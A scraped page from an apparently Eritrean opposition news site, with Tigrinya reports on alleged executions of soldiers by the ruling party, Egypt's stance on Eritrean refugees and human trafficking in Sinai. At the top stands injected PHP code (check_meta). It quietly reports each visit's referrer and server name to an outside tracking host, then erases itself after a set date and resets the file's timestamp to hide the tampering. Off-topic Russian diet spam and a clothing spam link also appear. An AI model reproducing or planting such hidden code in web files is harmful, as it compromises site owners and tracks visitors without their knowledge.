check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ደሃይ ሃገር
кремлевская диета

ደሃይ ሃገር

User Rating: / 0
PoorBest 

 

 

 

 

 

 

26 ሚያዝያ 2012

ኣብ እንዳ 22 ክፍለሰራዊት ልዑል ተፈታውነት ዝነበሮም 3 ኣባላት ብህግደፍ ከምዝተረሸኑ ሓደ ዜጋ ኣቃሊዑ

ብሰንኪ ኣደራዕ ምሕደራ ህግደፍ ኣብ ቤተ ተሃድሶ ቤሉል ግዳይ ስንክልና ምስ ኾነ ብሙርኩስ ተደጊፉ ናብ ስደት ኣምሪሑ ኣብ ሃገረ እስራኤል ንልዕሊ 2 ዓመታት ድሕሪ ምቕማጥ ኣብዚ ሕጂ እዋን ኣብ ኢትዮጵያ ዝርከብ ዘሎ ኣባል እንዳ 22 ክፍለሰራዊት ዝነበረ መንእሰይ ገብረሂወት ሃብተ ዝተብሃለ ዜጋ ምስ ሬድዮ ወጋሕታ ሳሊና ኣብ ዘካየዶ ቃለ መጠይቕ ከምዝሓበሮ እዚ ንህዝብን ሃገርን ኤርትራ ብሓይሊ ዓፊኑ ዝገዝእ ዘሎ ናይ ውሑዳት ጉጅለ ኣብ እዋን ኩናት ኤርትራን ኢትዮጵያን ንብዙሓት ሓርበኛታት ተቃለስቲ ዜጋታትና ሽርሕታትን ምስምሳትን እንዳማሃዘ ይቕንጽሎም ከምዝነበረ ኣቃሊዑ።

እዚ ኣብ 5 ዙርያ ናብ ሳዋ ወሪዱ ኣብ ኮር 2001 ምስ ተመደበ ምስ ኢትዮጵያ ኣብ ዝተፈጥረ ዶባዊ ኩናት ናብ እንዳ 22 ተወዝዑ ግቡኡ ድሕሪ ምፍጻሙ ኮብሊልካ ብዝብል ምስምስ ኣብ ቤት ማእሰርቲ የእትዮም የማነይቲ እግሩ ብምስንካል ንኣስታት 5 ዓመታት ብሙርኩስ ክጓዓዝ ከምዝገበርዎ ዝሓበረ እቲ ዜጋ ብጀካ እቲ ኣብ ገዛእ ነብሱ ዘውረድሉ ማህሰይቲ ደቂ ኣሃዱኡ ንዝነበሩ 3 ዜጋታትና ኣመሳሚሶም ከምዝቐተልዎምውን ቃሉ ሂቡዩ።

እዞም መራሒ ጋንታ ክፍለ ማትያስ ሓኪም ጋንታን ቦጦሎኒን ዮናስ ያቆብ (ወዲ ያቆብ) ከምኡውን ብድፍረቱን ቅይኡን ዝፍለጥ ኣማኑኤል ዓንዶምን ዝበሃሉ ዜጋታት ኣብ መላእ ኣሃዱ ክፍለሰራዊት 22 ብሓለፍትን ተራን ሰራዊት ልዑል ተቐባልነትን ተፈታውነትን ከምዝነበሮም ዘዘኻኸረ መንእሰይ ገብረሂወት ንሬሳ ኣማንኤል ዓንዶም ብቃሬዛ ገይሮም ናብቲ ተሃድሶ ብምምጻእ ንስኹም ድማ ጽባሕ ከምዚኣ ብምባል ናይ ታህዲድ ፕሮፖጋንዳ ከምዝነዝሕሎም ድማ ሓቢሩዩ።

እዚ ኣብ ልዕሊ ብጾተይ ዝተፈጸመ መርሸንቲ ዋላ’ኳ ብዙሓት ደቂ ኣሃዱይ ይፈልጥዎን ይዛራረብሉን እንተነበሩ ኣብ ቅድሚ ህዝበይን ዓለምን ቀሪበ ግና ምስክርነተይ ስለዝሃብኩ ናይ ሕልና ዕረፍቲ ተሰሚዑኒ’ዩ ዝበለ መንእሰይ ገብረሂወት ሃብተ ብዙሓት ወተሃደራት ብኢድ እቲ ስርዓት ጠፊኦም ክነሶም ተሰዊኦም ዝብል ናይ ኣሽካዕላል መርድእ ከምዝንገረሎም ድሕሪ ምዝኽኻር ብፍላይ እቲ ግዳይ ናይቲ ስርዓት ዝኾነ ኣባል ሓይልታት ምክልኻል ኤርትራ ኣብ ቅድሚ ዓይኑ ንዝራኣዩ እከይ ተግባራት ህግደፍ ከቃልዕ ከምዘለዎ ኣተሓሳሲቡ’ዩ።

---------------------------------------//////----------------------------------------

26 ሚያዝያ 2013

ኣብ ልዕሊ ኤርትራውያን ስደተኛታት ይወርድ ዘሎ በደል ኣቃልቦ ክግበረሉ ንዝቐረበ ለበዋ ግብጺ ተቃዊማቶ

ዝተፈላለዩ ምንጭታት ዘቃልሕዎ ሓበሬታ ከምዘረጋገጾ ጸጥታን ዝተወደበ ገበንን ኣብ ኣፍሪቃ ኣብ ትሕቲ ዝብል ቴማ ኣብ ኢትዮጵያ ዝተኻየደ ፎረም ንኤርትራውያን ስደተኛታት ኣብ ዝጥምት ኣጀንዳ ኣብ መንጎ ተሳተፍቲ ርሱን ምስሕሓብ ኣኸሲቱ’ዩ።

ፕረዚደንት ናይጀሪያ ነበር ኦሉሴንጎ ኦባሳንጆ ብኣቦመንበርነት ዝመርሖ እቲ ፎረም ቀዳማይ ሚኒስተር ኢትዮጵያ መራሕቲ ሃገራት ብሩንዲ ሶማልያ ሩዋንዳን ሱዳንን ከምኡ’ውን መራሕቲ ሃገራት ኣፍሪቃ ነበርን ፍሉጣት ኣፍሪቃውያን መሁራትን ኣብ ዘለዉሉ’ዩ ዘይሕጋዊ ዝውውር ሰባት ዘይሕጋዊ ዝውውር ገንዘብን ሽፍትነት ባሕርን ኣብ ዝብሉ ኣጀንዳታት ዝርርብ ኣካይዱ።

ኣብቲ መድረኽ መጽናዕታዊ ጽሑፍ ዘቕረበት ኤርትራዊት ዶ/ር ሜሮን እስቲፋኖስ እቲ ፎረም መንግስታትን ግዱሳት ትካላትን ምትሕብባር ክገብሩ ለበዋ ብምቅራብ ግዳይ ሕሱም ስቃይ ይኾኑ ንዘለዉ ኤርትራውያን ኣለኹልኩም ክብሎም ዝሓተተት ኮይና እቲ ለበዋ ብወገን ግብጺ ተቃውሞ ገጢሙዎ’ሎ።

ኣምባሳደር ግብጺ ኣብ ኢትዮጵያ መሓመድ እድሪስ ኤርትራውያን ጸገም ዝገጥሞም ዘሎ ዘይሕጋዊ ዝውውር ይገብሩ ስለዘለዉ’ዩ ስለዝኾነ ዝኾነ ይኹን ዓይነት ሓገዝ ኣይግብኦምን’ዩ ክብል ንለበዋ ሜሮን ከምዝተቓውሞ እቲ ሓበሬታ ኣነጺሩ።

እቲ ጉዳይ ኤርትራውያን ስደተኛታት ዝምልከት ኣጀንዳ ሓያል ምስሕሓብ ዘኸሰተ ኮይኑ ፕረዚደንት ናይጀሪያ ነበር ኦባሳንጆ ፕረዚደንት ደቡብ ኣፍሪቃ ነበር ታቦ ኢምቤኪን ካልኦት ፕረዚደንታትን ድማ ንመርገጺ ኣምባሳደር ግብጺ ከምዝኾነኑዎ ተጠቂሱ’ሎ።

ብዙሓት ተሳተፍቲ ንኤርትራውያን ስደተኛታት ንምሕጋዝ ምንቅስቓስ ክግበር ዝጠልብ ርኢቶ ሂቦም’ዮም።

እዚ ናይ ግብጺ መርገጺ ኣብ ቀረባ ኢሳይያስ ብሉኡኻቱ ኣቢሉ ፈለግ ኒል ሉኡላዊ ዋንነት ግብጺ’ዩ ክብል ዝሃቦ መግለጺ ምስቲ ብገበናት ሲናይ ኣቢሉ ዝሓፍሶ ዘሎ ሸርፊ ወጻኢ ብምትእስሳር ግብጺ ነቲ ከባቢ ከይትዓጽዎ ንዘቕረቦ ምሕጽንታ ከም ውዕለት ተቆጺሩ ዝተኸፈለ ክኸውን ከምዝኽእል ተንተንቲ ፖለቲካ ይሕብሩ።

--------------------------------------////////---------------------------------------

   

 

26 ሚያዝያ 2013

ኤርትራውያን ዜጋታት ብቀንዲ ግዳያት ዝኾነሉ ዘመናዊ ንግዲ ደቂ ሰብ ብዘሕዝን መልክዑ ይቕጽል ኣሎ

ካብ ግፍዕታት መላኺ ስርዓት ህግደፍ ንምህዳም ዶብ ሓሊፎም ናብ ጎረቤት ሱዳን ዘምርሑ ዜጋታትና ግዳይ ዘስካሕክሕ መሸጣ ናውቲ ውሽጣዊ ኣካላት ደቂሰብ ይኹን ከም ዘለዉ ኣብ መርበብ ሓበሬታ ድምጺ ኣሜሪካ መደብ ቋንቋ እንግሊዝኛ ዝተዘርገሐ ዜና ሓቢሩ።

እቲ ንኤርትራዊት ሽወደናዊት ተጣባቒት ሰብኣዊ መሰል ደቂ ሰባት ሜሮን እስቲፋኖስ ጠቒሱ ዝወጸ ዜና ኣብ ኢድ በዳዊን ኣትዮም ኣብ በረኻታት ሲናይ መከራ ይጸግቡ ካብ ዘለዉ ኤርትራውያን መዓልታዊ ካብ 15-20 ናይ ርድኡና ጻውዒት ቴሌፎናት ከም ዝስማዕ ገሊጹ።

ሜሮን እስቲፋኖስ ኣብ ዝሃበቶ ቃል ደሃይ እቶም ግዳያት ንምፍላጥ ናብ ሲናይ ኣብ ዝደወለትሉ እዋን ነታ ቴሌፎን ዝተቐበለት ኣደ ብ5 ሰብኡት ትዕመጽ ከም ዝነበረት ንምፍላጥ ከም ዝኸኣለት ገሊጻ’ያ።

ኤርትራውያን ስደተኛታት ብገበነኛታት በዳዊን ነጋዶ ደቂሰብ እንተተታሒዞም ዘለዎም ኣማራጺ ወይ  ክሳብ 50 ሺሕ ደላር ከፊሎም ሂወቶም ምድሓን ወይ ከኣ መተካእታ ዘይብላ ሂወቶም ምስኣን ምዃኑ ድማ ሜሮን እስቲፋኖስ ወሲኻ ሓቢራ’ያ።

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player